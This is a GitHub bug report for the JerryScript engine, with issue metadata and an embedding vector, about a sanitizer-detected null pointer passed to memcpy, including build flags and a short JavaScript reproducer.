<!-- First of all, when reporting a bug, give the issue a descriptive title. In the body of the issue, optionally give a free-form text description of the bug. Give the context necessary for others to understand the problem. Then, provide information necessary to reproduce the bug. Omit sections that are irrelevant for the bug report, but note that information like git revision, build platform, build command, and test case are required in almost all cases. --> ###### JerryScript revision <!-- Identify the git hash(es) or tag(s) where the issue was observed. --> ccc1525 ###### Build platform <!-- Name the build platform. E.g., copy the output of `echo "$(lsb_release -ds) ($(uname -mrs))"` (on Linux), `echo "$(sw_vers -productName) $(sw_vers -productVersion) ($(uname -mrs))"` (on macOS), or `python -c "import platform; print(platform.platform())"` (should work everywhere). --> Ubuntu 20.04.1 LTS (Linux 5.4.0-74-generic x86_64) ###### Build steps <!-- Describe how to build JerryScript. Give all the necessary details of the build (e.g., environment variables, command(s), profile, command line options, etc.). E.g.: ```sh tools/build.py --clean --debug ``` Or: ```sh mkdir build && cmake -H. -Bbuild && make -C build ``` Even if the bug was originally observed when JerryScript was integrated into a larger project, try to reproduce it with as few external code as possible, preferably by building the `jerry` command line tool. --> ```sh readonly FLAGS=( "-g -O1 -fsanitize=address,undefined -fno-sanitize-recover=undefined,address" ) cmake -D CMAKE_C_FLAGS="${FLAG}" -D CMAKE_BUILD_TYPE=Debug -D CMAKE_INSTALL_PREFIX:PATH="${INSTALL_DIR}" "${SRC_FOLDER}" make make install ``` <!-- ###### Build log Copy the build log if the reported issue is a build problem. Do a verbose build if necessary. Try and trim the log to relevant parts. --> ###### Test case <!-- Give the JavaScript input that should be passed to the engine to trigger the bug. Try and post a reduced test case that is minimally necessary to reproduce the issue. As a rule of thumb, use Markdown's fenced code block syntax for the test case. Attach the file (renamed to .txt) if the test case contains 'problematic' bytes that cannot be copied in the bug report directly. --> ```javascript function func() {} var bound = func.bind(); if (function() { return func.bind()(0, 0, 0, 0, 0, 0, 0) }()); for (var idx = 0; idx < 50; idx++) { var args = new Array(idx); bound.apply(undefined, args); delete args; } for (var idx = 0; idx < 25; idx++) { var args = new Array(idx); func.bind.apply(func, args).apply(undefined, args); delete args; } ``` <!-- ###### Execution platform Unnecessary if the same as the build platform. --> <!-- ###### Execution steps List the steps that trigger the bug. E.g., if a bug is snapshot-specific: ```sh build/bin/jerry-snapshot generate -o testcase.js.snapshot testcase.js build/bin/jerry --exec-snapshot testcase.js.snapshot ``` Unnecessary if trivial (i.e., `build/bin/jerry testcase.js`). --> ###### Output <!-- Copy relevant output from the standard output and/or error channels. --> ``` /tmp/tmp.F2MvT4tsOz/jerryscript/jerry-core/ecma/base/ecma-helpers-collection.c:227:3: runtime error: null pointer passed as argument 2, which is declared to never be null ``` <!-- ###### Backtrace In case of a crash (assertion failure, etc.), try to copy the backtrace from a debugger at the point of failure. --> ###### Expected behavior <!-- Describe what should happen instead of current behavior. Unnecessary if trivial (e.g., in case of a crash, the trivial expected behavior is not to crash). --> This undefined behavior is discussed in #4319. The second parameter of ```memcpy``` should not be a null pointer even if the third parameter equals 0.
ubsan: jerryscript/jerry-core/ecma/base/ecma-helpers-collection.c:227:3: runtime error: null pointer passed as argument 2, which is declared to never be null
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4698/comments
0
2021-06-29T09:01:18
2021-06-29T09:01:18Z
https://github.com/jerryscript-project/jerryscript/issues/4698
932,391,080
4,698
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : ubsan: jerryscript/jerry-core/ecma/base/ecma-helpers-collection.c:227:3: runtime error: null pointer passed as argument 2, which is declared to never be null Issue date: --- start body --- <!-- First of all, when reporting a bug, give the issue a descriptive title. In the body of the issue, optionally give a free-form text description of the bug. Give the context necessary for others to understand the problem. Then, provide information necessary to reproduce the bug. Omit sections that are irrelevant for the bug report, but note that information like git revision, build platform, build command, and test case are required in almost all cases. --> ###### JerryScript revision <!-- Identify the git hash(es) or tag(s) where the issue was observed. --> ccc1525 ###### Build platform <!-- Name the build platform. E.g., copy the output of `echo "$(lsb_release -ds) ($(uname -mrs))"` (on Linux), `echo "$(sw_vers -productName) $(sw_vers -productVersion) ($(uname -mrs))"` (on macOS), or `python -c "import platform; print(platform.platform())"` (should work everywhere). --> Ubuntu 20.04.1 LTS (Linux 5.4.0-74-generic x86_64) ###### Build steps <!-- Describe how to build JerryScript. Give all the necessary details of the build (e.g., environment variables, command(s), profile, command line options, etc.). E.g.: ```sh tools/build.py --clean --debug ``` Or: ```sh mkdir build && cmake -H. -Bbuild && make -C build ``` Even if the bug was originally observed when JerryScript was integrated into a larger project, try to reproduce it with as few external code as possible, preferably by building the `jerry` command line tool. --> ```sh readonly FLAGS=( "-g -O1 -fsanitize=address,undefined -fno-sanitize-recover=undefined,address" ) cmake -D CMAKE_C_FLAGS="${FLAG}" -D CMAKE_BUILD_TYPE=Debug -D CMAKE_INSTALL_PREFIX:PATH="${INSTALL_DIR}" "${SRC_FOLDER}" make make install ``` <!-- ###### Build log Copy the build log if the reported issue is a build problem. Do a verbose build if necessary. Try and trim the log to relevant parts. --> ###### Test case <!-- Give the JavaScript input that should be passed to the engine to trigger the bug. Try and post a reduced test case that is minimally necessary to reproduce the issue. As a rule of thumb, use Markdown's fenced code block syntax for the test case. Attach the file (renamed to .txt) if the test case contains 'problematic' bytes that cannot be copied in the bug report directly. --> ```javascript function func() {} var bound = func.bind(); if (function() { return func.bind()(0, 0, 0, 0, 0, 0, 0) }()); for (var idx = 0; idx < 50; idx++) { var args = new Array(idx); bound.apply(undefined, args); delete args; } for (var idx = 0; idx < 25; idx++) { var args = new Array(idx); func.bind.apply(func, args).apply(undefined, args); delete args; } ``` <!-- ###### Execution platform Unnecessary if the same as the build platform. --> <!-- ###### Execution steps List the steps that trigger the bug. E.g., if a bug is snapshot-specific: ```sh build/bin/jerry-snapshot generate -o testcase.js.snapshot testcase.js build/bin/jerry --exec-snapshot testcase.js.snapshot ``` Unnecessary if trivial (i.e., `build/bin/jerry testcase.js`). --> ###### Output <!-- Copy relevant output from the standard output and/or error channels. --> ``` /tmp/tmp.F2MvT4tsOz/jerryscript/jerry-core/ecma/base/ecma-helpers-collection.c:227:3: runtime error: null pointer passed as argument 2, which is declared to never be null ``` <!-- ###### Backtrace In case of a crash (assertion failure, etc.), try to copy the backtrace from a debugger at the point of failure. --> ###### Expected behavior <!-- Describe what should happen instead of current behavior. Unnecessary if trivial (e.g., in case of a crash, the trivial expected behavior is not to crash). --> This undefined behavior is discussed in #4319. The second parameter of ```memcpy``` should not be a null pointer even if the third parameter equals 0. --- end body ---
4,192
[ 0.004465251695364714, -0.004475628025829792, -0.0030765619594603777, 0.01423623226583004, 0.032678309828042984, 0.004724658094346523, -0.03157150745391846, 0.03533463180065155, -0.021582625806331635, -0.014969488605856895, -0.032346270978450775, 0.011130271479487419, 0.019258344545960426, 0.01898164302110672, 0.023561034351587296, 0.008985843509435654, -0.04501914605498314, 0.025760801509022713, -0.048505570739507675, -0.000151104322867468, 0.028389455750584602, -0.010016552172601223, -0.022717097774147987, 0.05932455137372017, -0.01891246810555458, -0.007443238981068134, 0.004503298085182905, 0.008432443253695965, 0.00282926089130342, -0.004835338331758976, 0.0005499419057741761, -0.002711663255468011, -0.010493860580027103, 0.016657359898090363, 0.033757440745830536, 0.00034522690111771226, 0.022025346755981445, 0.041256021708250046, -0.005554759409278631, -0.000026940453608403914, -0.006312226410955191, -0.059158533811569214, -0.024211280047893524, 0.0273103229701519, 0.01660202071070671, 0.06220223754644394, 0.015688909217715263, 0.009857449680566788, -0.02974528633058071, 0.03879338875412941, 0.01192578487098217, -0.019659558311104774, 0.005423326510936022, -0.061261456459760666, 0.02699211798608303, -0.0032927340362221003, 0.02282777801156044, -0.0011050719767808914, 0.024654000997543335, 0.01732144132256508, 0.0021513451356440783, 0.00027756503550335765, 0.009608419612050056, 0.00690713245421648, 0.022606417536735535, 0.06690613925457001, -0.02037898078560829, 0.012320082634687424, -0.0013601550599560142, -0.0007959458162076771, -0.003521011909469962, 0.006969389971345663, 0.022412726655602455, 0.06552264094352722, -0.013157101348042488, -0.025608615949749947, 0.012292413040995598, 0.04366331547498703, -0.0020389356650412083, -0.005561676807701588, -0.009151863865554333, 0.013316203840076923, 0.014914148487150669, 0.010680632665753365, -0.0040467423386871815, -0.0044687106274068356, -0.01647750474512577, -0.05810707062482834, -0.01526002399623394, 0.003010845510289073, -0.016145464032888412, 0.034338511526584625, -0.033702101558446884, 0.01653284579515457, -0.012672876007854939, 0.021333595737814903, -0.03483657166361809, -0.014706622809171677, -0.030796747654676437, -0.0010073621524497867, 0.00821108277887106, 0.0033895792439579964, -0.007706104312092066, 0.014831137843430042, 0.01371741946786642, 0.04200311005115509, 0.04983372986316681, -0.024806184694170952, 0.04106232896447182, 0.12374038994312286, 0.012167897075414658, -0.006187711376696825, -0.0402875691652298, -0.027462508529424667, 0.022993797436356544, 0.003932603634893894, 0.025608615949749947, -0.0181515421718359, -0.026245027780532837, 0.004928724840283394, -0.006118536461144686, -0.0027704620733857155, -0.004620895721018314, 0.0006718630320392549, -0.03608172386884689, 0.03810163587331772, 0.012596783228218555, -0.0005274600116536021, 0.012769720517098904, -0.020669516175985336, -0.049391008913517, -0.006550880614668131, -0.0037735009100288153, -0.0003657632623799145, 0.005682733375579119, -0.02924722619354725, 0.00009008974302560091, 0.03848901763558388, -0.02256491221487522, -0.030298687517642975, -0.03635842353105545, -0.023644043132662773, 0.03002198599278927, -0.0035019887145608664, -0.027849888429045677, -0.01942436397075653, -0.0171830914914608, 0.016131630167365074, -0.016325319185853004, -0.010687550529837608, -0.004174716304987669, -0.008667638525366783, 0.038765717297792435, -0.00027691651484929025, 0.046015266329050064, -0.001898856135085225, 0.0016212910413742065, 0.035113271325826645, -0.007228796370327473, 0.014180892147123814, -0.011081848293542862, -0.0036351506132632494, -0.015384539030492306, -0.010639128275215626, -0.019507374614477158, -0.0039568147622048855, -0.024391135200858116, 0.026217356324195862, -0.0019974305760115385, 0.012873482890427113, -0.028583144769072533, 0.017777996137738228, 0.01885712891817093, 0.030547717586159706, -0.022551078349351883, -0.027462508529424667, -0.007699186913669109, -0.000037316716770874336, 0.01381426490843296, -0.011434641666710377, 0.020600339397788048, -0.006889838259667158, -0.004119376186281443, -0.002768732840195298, 0.02789139375090599, -0.03317636996507645, 0.013074090704321861, -0.022108357399702072, 0.011628331616520882, -0.026369541883468628, 0.0008664179476909339, -0.010397015139460564, -0.0118911974132061, -0.010818983428180218, 0.031239468604326248, 0.03065839782357216, -0.025345752015709877, -0.04817352816462517, -0.01426390279084444, -0.006924426183104515, 0.038239985704422, 0.018317561596632004, -0.020365145057439804, -0.011455394327640533, -0.01674037054181099, -0.008301010355353355, -0.013779676519334316, 0.024709340184926987, 0.026065172627568245, -0.009442399255931377, -0.00598018616437912, -0.01426390279084444, 0.020558835938572884, -0.02559478208422661, -0.004254267551004887, 0.00036338536301627755, 0.01365516148507595, 0.014803468249738216, -0.027241148054599762, 0.013585986569523811, 0.00872297864407301, 0.007277219090610743, -0.00948390457779169, -0.019161498174071312, -0.06696148216724396, -0.0025058675091713667, -0.002875954145565629, 0.039651159197092056, -0.018566593527793884, -0.0028673072811216116, 0.01763964630663395, 0.0034276254009455442, 0.00038716429844498634, 0.0021323219407349825, 0.022039182484149933, -0.00596635090187192, -0.016062455251812935, -0.009262544102966785, 0.011842774227261543, 0.01757047139108181, -0.012479185126721859, 0.015315364114940166, -0.046208955347537994, -0.03624774515628815, 0.02340884879231453, 0.015495219267904758, -0.035168614238500595, -0.05019344016909599, -0.0322079211473465, 0.013897274620831013, -0.014374583028256893, -0.010715221054852009, -0.017542801797389984, -0.031184127554297447, -0.014568272978067398, -0.025318080559372902, -0.01381426490843296, 0.010701385326683521, -0.006357190199196339, 0.006699606776237488, 0.014090964570641518, -0.008065815083682537, -0.029136545956134796, 0.01609012484550476, 0.027780713513493538, 0.00855695828795433, -0.04308224469423294, 0.0045724730007350445, -0.011164858937263489, -0.023810064420104027, 0.03865503892302513, -0.020434319972991943, 0.0010341674787923694, 0.009428564459085464, -0.00671690097078681, 0.004064036067575216, -0.004589766729623079, 0.024031424894928932, -0.03918076679110527, -0.011607578955590725, 0.020185289904475212, 0.0026874521281570196, 0.005561676807701588, 0.010230994783341885, 0.0004089977010153234, -0.009179533459246159, 0.002412481000646949, -0.0005918793031014502, -0.000116949129733257, -0.019535044208168983, -0.01272821519523859, -0.013122513890266418, -0.012154062278568745, -0.004108999855816364, 0.025359585881233215, -0.015868764370679855, 0.0017501296242699027, -0.0017414827598258853, -0.0332317091524601, 0.01279047317802906, -0.016823381185531616, -0.04457642510533333, 0.02205301634967327, 0.01788867637515068, -0.02630036696791649, -0.007892876863479614, 0.00897200871258974, -0.027407169342041016, -0.0017354299779981375, -0.0246955044567585, 0.05431627854704857, -0.04474244639277458, -0.0007630876498296857, -0.042860884219408035, -0.021748647093772888, 0.0009727746364660561, 0.03187587857246399, -0.011116435751318932, -0.00766459945589304, 0.007920547388494015, -0.043829333037137985, -0.0227586030960083, -0.02852780558168888, -0.009663759730756283, 0.03597104549407959, -0.043497294187545776, -0.03361909091472626, 0.05586579814553261, -0.05636385828256607, -0.004281937610358, 0.00022806160268373787, -0.050304122269153595, -0.005094745196402073, -0.0006852656952105463, -0.031709857285022736, -0.026245027780532837, -0.035306964069604874, 0.015107838436961174, 0.021983841434121132, -0.006166958715766668, -0.02591298706829548, -0.01578575372695923, -0.006332979071885347, -0.0056688981130719185, 0.006246509961783886, -0.0343661829829216, -0.0018193047726526856, 0.03002198599278927, 0.029662275686860085, 0.004807668272405863, 0.0009546161745674908, 0.021970007568597794, -0.0001335943816229701, -0.014097882434725761, 0.036386094987392426, -0.040564268827438354, -0.046015266329050064, 0.0027203101199120283, 0.003271981608122587, 0.026466388255357742, 0.011842774227261543, -0.0434696227312088, -0.0032581465784460306, 0.01423623226583004, 0.01961805485188961, -0.009615336544811726, 0.0072910538874566555, -0.013696666806936264, -0.03359141945838928, -0.033702101558446884, -0.02129209041595459, 0.021264420822262764, -0.018165377900004387, -0.006824122276157141, -0.02053116448223591, -0.023436518386006355, 0.01732144132256508, 0.019119992852211, -0.012866565957665443, 0.011358548887073994, 0.0031353607773780823, -0.00004550423545879312, 0.01845591329038143, -0.05127257481217384, 0.027241148054599762, 0.02237122319638729, -0.0434696227312088, 0.03586036339402199, 0.0021357806399464607, -0.035694342106580734, -0.012901153415441513, 0.04385700449347496, -0.03967882692813873, -0.042943891137838364, -0.022537242621183395, 0.04477011412382126, -0.018428241834044456, -0.015343033708631992, -0.0033428859896957874, -0.025871481746435165, -0.008570793084800243, -0.03198656067252159, -0.004202386364340782, -0.01660202071070671, 0.023561034351587296, 0.00598018616437912, 0.007934382185339928, -0.029385576024651527, -0.004914889577776194, 0.011586826294660568, 0.04092397913336754, -0.030824417248368263, -0.010431602597236633, 0.010542282834649086, 0.02026830054819584, 0.0048733847215771675, 0.009048101492226124, -0.012154062278568745, -0.05456530675292015, -0.01557822898030281, -0.021402770653367043, -0.031765200197696686, 0.035555992275476456, 0.012638287618756294, 0.01711391657590866, 0.0029070829041302204, -0.04468710348010063, 0.027877559885382652, 0.031460829079151154, 0.00025681249098852277, -0.05121723189949989, 0.014969488605856895, -0.006173876114189625, 0.05013810098171234, 0.016851050779223442, -0.03461521118879318, 0.0002857795625459403, -0.03669046610593796, -0.02141660638153553, 0.007685352116823196, 0.050497811287641525, 0.03967882692813873, -0.05035946145653725, -0.03361909091472626, 0.0059698098339140415, -0.03685648366808891, -0.04958470165729523, 0.01563357003033161, -0.011884279549121857, 0.01557822898030281, 0.0002084980224026367, -0.004838797263801098, 0.015439879149198532, 0.015509054064750671, 0.017335277050733566, -0.017805667594075203, -0.011946537531912327, -0.0021115695126354694, -0.01853892207145691, 0.03179286792874336, -0.011026508174836636, 0.010473107919096947, -0.01584109477698803, -0.009027348831295967, -0.03494725376367569, 0.018649602308869362, 0.03644143417477608, -0.02347802370786667, -0.011330879293382168, -0.03187587857246399, 0.027587024495005608, -0.006851792335510254, 0.04355263337492943, 0.009954295121133327, -0.00021109209046699107, -0.012022629380226135, -0.027171973139047623, 0.0025404549669474363, -0.011552238836884499, -0.044659435749053955, -0.0403982512652874, -0.02025446482002735, -0.038765717297792435, 0.042418163269758224, 0.018040861934423447, -0.01995009370148182, 0.01884329319000244, 0.017861006781458855, -0.008605380542576313, 0.0041228351183235645, 0.01704474166035652, 0.006637349259108305, -0.022883117198944092, -0.04922499135136604, -0.018691107630729675, -0.015121673233807087, -0.010569953359663486, -0.003853052156046033, 0.017473626881837845, 0.0025179730728268623, 0.024654000997543335, -0.04997207969427109, 0.03765891492366791, -0.0016135089099407196, 0.008785235695540905, -0.02827877551317215, -0.0392637774348259, 0.043635644018650055, -0.020157620310783386, -0.03909775987267494, -0.014208562672138214, -0.021112235262989998, 0.000196932815015316, -0.026341872289776802, -0.008812906220555305, -0.03486424311995506, -0.0009105170611292124, -0.010265582241117954, 0.041145339608192444, 0.010106479749083519, -0.033370062708854675, -0.013364626094698906, -0.01763964630663395, 0.047232747077941895, 0.051521603018045425, 0.0007306618499569595, 0.012811225838959217, 0.01762581244111061, -0.02686760388314724, -0.03572201356291771, -0.01564740389585495, 0.016560515388846397, -0.006768782157450914, 0.06253428012132645, 0.004036366008222103, -0.01692022569477558, -0.005751908291131258, 0.04189243167638779, -0.0008050250471569598, 0.0037942533381283283, -0.0006078760488890111, 0.06530127674341202, -0.017459791153669357, 0.01732144132256508, -0.014858808368444443, 0.041256021708250046, -0.03110111877322197, 0.011420806869864464, 0.0217348113656044, 0.018497418612241745, 0.005105121061205864, -0.009781356900930405, 0.009795191697776318, -0.0027739210054278374, -0.018068531528115273, -0.015827259048819542, -0.016076289117336273, 0.02309064380824566, 0.03198656067252159, -0.011144106276333332, 0.003946438431739807, 0.007284136489033699, 0.013150183483958244, -0.03868270665407181, -0.019078487530350685, -0.01834523305296898, -0.010314005427062511, 0.04919731989502907, -0.056778911501169205, 0.011130271479487419, 0.019161498174071312, 0.002737604081630707, 0.026051336899399757, -0.031958889216184616, -0.01426390279084444, -0.005181213840842247, -0.03483657166361809, 0.020019270479679108, -0.009532326832413673, -0.019673394039273262, 0.027213478460907936, -0.027019787579774857, -0.01610396057367325, 0.009248709306120872, 0.017777996137738228, -0.031184127554297447, -0.0029468585271388292, 0.008307927288115025, 0.03408948332071304, -0.027683869004249573, -0.022468067705631256, -0.0018400573171675205, 0.01705857552587986, 0.006173876114189625, 0.020475825294852257, -0.014637447893619537, 0.00763001199811697, 0.005281517747789621, 0.04374632239341736, -0.0108674056828022, 0.011164858937263489, -0.0009675865294411778, -0.0004660671402234584, -0.029468586668372154, -0.017722656950354576, 0.018137706443667412, 0.0005559947458095849, 0.009151863865554333, -0.012015712447464466, 0.02302146889269352, -0.030603056773543358, 0.03317636996507645, 0.03137781843543053, 0.00942164659500122, -0.00900659617036581, 0.011572991497814655, 0.000030156013963278383, 0.011462311260402203, 0.007491661701351404, 0.028887515887618065, 0.020033104345202446, -0.036137063056230545, -0.0030073868110775948, -0.0026113593485206366, -0.0004018640029244125, 0.03212491050362587, -0.01788867637515068, -0.021001555025577545, -0.01750129647552967, -0.008764483034610748, -0.018414407968521118, 0.008902833797037601, 0.014485262334346771, -0.017072411254048347, -0.015010992996394634, 0.02596832625567913, 0.010542282834649086, 0.022481903433799744, -0.01660202071070671, -0.0024781974498182535, 0.0016593373147770762, 0.014014871791005135, -0.03320404142141342, 0.018386738374829292, -0.017999356612563133, 0.001782987848855555, 0.00761617673560977, 0.013966449536383152, 0.0013290263013914227, 0.006350272800773382, -0.007809867151081562, -0.038572028279304504, 0.014250067062675953, 0.0066304318606853485, -0.00798280443996191, -0.006876003462821245, 0.022855447605252266, 0.0728275328874588, -0.013316203840076923, -0.018940137699246407, -0.02949625626206398, -0.0343661829829216, -0.007623094134032726, -0.011911950074136257, 0.029523925855755806, -0.02732415869832039, -0.043248262256383896, -0.0005399980000220239, 0.007221878971904516, 0.029219556599855423, -0.0016532845329493284, -0.009822862222790718, 0.007284136489033699, 0.0043476540595293045, 0.0030731032602488995, -0.010106479749083519, -0.03143315762281418, -0.009476986713707447, -0.03256763145327568, 0.012008794583380222, 0.012416928075253963, 0.015398373827338219, 0.0011266892543062568, 0.01698940061032772, 0.012257824651896954, 0.004019072279334068, -0.01596560887992382, 0.001938631758093834, -0.01192578487098217, -0.007491661701351404, -0.0005607505445368588, 0.02861081436276436, 0.01224398985505104, 0.010652963072061539, 0.016851050779223442, 0.002832719823345542, 0.03522395342588425, 0.0012883859453722835, -0.029551595449447632, -0.022551078349351883, 0.00596635090187192, 0.002054499927908182, -0.024903031066060066, 0.0034120611380785704, 0.011400054208934307, 0.03868270665407181, 0.00479383347555995, 0.011012673377990723, 0.026148181408643723, -0.006187711376696825, -0.025733131915330887, -0.006222298834472895, -0.03467055410146713, 0.015080168843269348, -0.0024384218268096447, -0.01375200692564249, 0.011773599311709404, 0.02192850224673748, 0.0003908392391167581, 0.002236084546893835, -0.018953973427414894, -0.0049944412894546986, -0.03182053938508034, -0.0303816981613636, 0.009234873577952385, -0.03500259295105934, 0.007187291514128447, -0.00942164659500122, -0.004434123169630766, 0.012569112703204155, -0.00283617852255702, -0.033314719796180725, 0.006616597063839436, 0.00716653885319829, -0.037852607667446136, -0.014097882434725761, -0.004652024246752262, -0.028749166056513786, -0.006564715411514044, -0.0022966128308326006, -0.001425871392711997, 0.01622847467660904, 0.007463991641998291, -0.02653556317090988, -0.0008850087178871036, -0.017390616238117218, -0.010756725445389748, -0.009262544102966785, -0.0333423912525177, 0.012804307974874973, -0.0049183485098183155, 0.028555475175380707, 0.02104306034743786, -0.0028724954463541508, -0.018068531528115273, 0.008688390254974365, 0.036386094987392426, -0.015010992996394634, 0.0020441238302737474, -0.002965881722047925, 0.0151908490806818, 0.012188649736344814, 0.0052918940782547, 0.041837092489004135, -0.002600983250886202, -0.001347184763289988, 0.014360747300088406, -0.022606417536735535, -0.002130592707544565, 0.00817649532109499, 0.008681473322212696, -0.0021496156696230173, -0.03417249023914337, 0.009276378899812698, 0.018884798511862755, -0.0108950762078166, 0.002647676272317767, -0.006108160130679607, 0.00894433818757534, 0.00894433818757534, -0.032927341759204865, 0.020987721160054207, 0.004499839153140783, 0.008377103134989738, 0.017155421897768974, 0.0021496156696230173, 0.011697506532073021, -0.005419868044555187, 0.013952614739537239, 0.0022032265551388264, -0.01993625983595848, -0.02872149460017681, 0.019894754514098167, -0.017017070204019547, -0.0020821699872612953, -0.023754723370075226, 0.0010125503176823258, 0.02750401385128498, -0.03605405613780022, -0.014416087418794632, 0.034255500882864, 0.029606936499476433, -0.025096720084547997, 0.020019270479679108, 0.0055651357397437096, -0.024031424894928932, 0.0007470909040421247, 0.007733774371445179, -0.02187316119670868, 0.010390098206698895, -0.014180892147123814, 0.008183412253856659, 0.0005201101885177195, -0.0015607628738507628, -0.0070212711580097675, 0.008799070492386818, 0.022495737299323082, -0.013662079349160194, 0.005727697163820267, 0.029274895787239075, -0.01642216555774212, -0.004288855474442244, 0.03563900291919708, -0.03193121775984764, 0.005177754908800125, 0.023547198623418808, 0.023104477673768997, 0.0020838994532823563, 0.03115645796060562, -0.002357141114771366, -0.026245027780532837, -0.00640907185152173, -0.027988240122795105, 0.0057138619013130665, -0.02185932733118534, 0.01891246810555458, -0.013115596026182175, 0.021388936787843704, -0.019770238548517227, 0.04394001513719559, -0.0006921832100488245, -0.0012287223944440484, -0.006993601098656654, 0.002739333314821124, -0.014692788012325764, 0.004641648381948471, -0.009435481391847134, 0.001848704181611538, -0.004551720805466175, -0.023436518386006355, 0.023298168554902077, 0.03090742789208889, -0.013807347044348717, 0.0045275092124938965, -0.009338636882603168, -0.019286014139652252, -0.006665019318461418, 0.01092966366559267, -0.009435481391847134, -0.009193369187414646, 0.04059194028377533, 0.0011119894916191697, -0.0015330928144976497, -0.018774118274450302, 0.018635768443346024, 0.0015521160094067454, -0.014471427537500858, -0.05271141603589058, 0.01596560887992382, -0.005150084849447012, 0.008965090848505497, -0.01936902292072773, 0.03469822183251381, 0.019396694377064705, -0.000901870196685195, -0.0057588256895542145, -0.0011068013263866305, -0.001981866080313921, 0.016394495964050293, 0.010791312903165817, 0.0023536821827292442, 0.018372902646660805, -0.000032263691537082195, -0.018289892002940178, 0.0105837881565094, -0.04692837595939636, 0.01372433640062809, -0.048643920570611954, -0.005637769587337971, -0.0029364824295043945, 0.01467895321547985, 0.03378511220216751, -0.01526002399623394, -0.023962249979376793, 0.017266100272536278, 0.019701063632965088, -0.013260863721370697, -0.0197425689548254, -0.008384020067751408, -0.01484497357159853, -0.020863205194473267, -0.031018108129501343, -0.012742050923407078, -0.029606936499476433, 0.0004535291518550366, -0.008446278050541878, 0.02397608384490013, 0.017736492678523064, -0.007318723946809769, 0.04673468694090843, 0.04413370415568352, 0.001324702869169414, -0.03182053938508034, -0.049612369388341904, -0.028555475175380707, 0.011116435751318932, -0.045046813786029816, 0.026258861646056175, 0.01365516148507595, 0.046319637447595596, 0.007180373650044203, 0.010500777512788773, -0.008224917575716972, -0.012569112703204155, -0.014457592740654945, -0.030630728229880333, -0.018926303833723068, -0.0034086022060364485, -0.0014535414520651102, 0.02245423197746277, -0.017584307119250298, -0.005070533603429794, 0.004434123169630766, -0.009580749087035656, 0.027545519173145294, 0.006090866401791573, -0.01083281822502613, 0.002806778997182846, -0.021914666518568993, -0.038184646517038345, -0.007138868793845177, 0.008577710948884487, 0.007955134846270084, -0.011393136344850063, -0.007353311404585838, 0.006709983106702566, 0.017473626881837845, -0.02789139375090599, 0.005828001070767641, 0.0217348113656044, -0.04275020211935043, 0.006682313047349453, 0.008390937931835651, -0.0241836104542017, -0.02968994714319706, 0.01602094992995262, -0.014319242909550667, 0.0004176445654593408, -0.03788027539849281, 0.016629690304398537, 0.0018383278511464596, 0.022136026993393898, 0.0027548978105187416, -0.015218518674373627, 0.0053230226039886475, 0.027559353038668633, -0.04360797256231308, 0.00048206388601101935, -0.020863205194473267, -0.021388936787843704, -0.018497418612241745, 0.011614496819674969, 0.03500259295105934, 0.010625293478369713, -0.03577735275030136, 0.025359585881233215, 0.021817822009325027, -0.018248386681079865, -0.009366306476294994, 0.027421003207564354, 0.0034155198372900486, -0.0071250335313379765, 0.02320132404565811, -0.006862168200314045, 0.0002702151832636446, -0.005402574315667152, 0.0030437037348747253, 0.02007460966706276, 0.005814165808260441, 0.010258665308356285, -0.013060255907475948, -0.019341353327035904, 0.0002795105683617294, -0.016394495964050293, 0.015273858793079853, 0.03710551559925079, 0.003104232018813491, -0.00497022969648242, -0.02642488293349743, -0.018898632377386093, -0.038572028279304504, -0.016754206269979477, 0.034974921494722366, 0.010673715732991695, -0.030354026705026627, 0.032539959996938705, 0.021333595737814903, 0.00007420108886435628, -0.020946215838193893, 0.002920917933806777, -0.03013266623020172, -0.015661239624023438, 0.04429972544312477, 0.0004764433833770454, 0.024142105132341385, 0.014609778299927711, -0.030492376536130905, 0.038322996348142624, 0.04659633710980415, 0.018580427393317223, -0.03962348774075508, 0.008453194983303547, 0.004620895721018314, -0.01584109477698803, -0.0027946734335273504, 0.00355905806645751, 0.007000518497079611, -0.01532919891178608, 0.02161029726266861, 0.012451515533030033, -0.017293771728873253, -0.000684833328705281, -0.009255626238882542, 0.022011512890458107, 0.008716060779988766, -0.028500134125351906, 0.012541443109512329, -0.01330236904323101, -0.009061936289072037, 0.010348592884838581, 0.06640808284282684, 0.007045482285320759, -0.013565233908593655, 0.004406453110277653, -0.02012994885444641, 0.010985003784298897, 0.027739208191633224, -0.0063295201398432255, 0.003265063976868987, -0.018317561596632004, -0.0009589396067894995, -0.03884872794151306, 0.02217753231525421, -0.011268621310591698, 0.001480346778407693, -0.025816142559051514, -0.0035971044562757015, -0.0424458310008049, 0.018137706443667412, -0.000008153742783179041, -0.005630851723253727, -0.026660077273845673, -0.022080687806010246, -0.012077969498932362, -0.014443757943809032, -0.008805988356471062, 0.013509893789887428, 0.010341675020754337, -0.012327000498771667, 0.013226276263594627, 0.0002470847684890032, 0.023671714588999748, -0.01151073444634676, -0.011406971141695976, 0.018248386681079865, -0.028098920360207558, -0.0036593619734048843, -0.00009906088234856725, 0.006384860258549452, -0.021817822009325027, 0.00004118079232284799, -0.007374064065515995, -0.008301010355353355, 0.0063295201398432255, -0.028444794937968254, -0.029911307618021965, -0.00689329719170928, -0.041145339608192444, 0.0035486819688230753, -0.012105640023946762, -0.018677273765206337, -0.012119474820792675, -0.028444794937968254, 0.009310966357588768, -0.0012987622758373618, -0.010466190055012703, 0.019576549530029297, 0.07714405655860901, -0.003960273694247007, -0.004876843653619289, -0.010639128275215626, 0.0031837832648307085, 0.009324801154434681, 0.004074412398040295, -0.004524050746113062, 0.0095876669511199, -0.021817822009325027, 0.006983224768191576, 0.0072011263109743595, 0.008501618169248104, 0.01743212155997753, 0.024958370253443718, 0.015010992996394634, -0.022426562383770943, -0.02796056866645813, 0.011905032210052013, -0.0013082737568765879, 0.013413049280643463, 0.011877361685037613, 0.003425896167755127, -0.0012840625131502748, 0.03378511220216751, 0.0010428144596517086, -0.019922424107789993, -0.029772955924272537, -0.028500134125351906, 0.01227857731282711, 0.040951650589704514, 0.009234873577952385, -0.007775279693305492, -0.01584109477698803, 0.008501618169248104, 0.01128245610743761, 0.024142105132341385, 0.018428241834044456, -0.020794030278921127, -0.027282653376460075, -0.015951775014400482, -0.01603478379547596, -0.02533191628754139, 0.020157620310783386, 0.003604021854698658, -0.009497739374637604, 0.024335794150829315, -0.011220199055969715, -0.03314870223402977, 0.008543122559785843, -0.010459273122251034, 0.003197618294507265, 0.01333695650100708, 0.006097783800214529, 0.00766459945589304, -0.00036965435720048845, -0.014402252621948719, -0.03367443010210991, -0.00596635090187192, -0.01905081793665886, 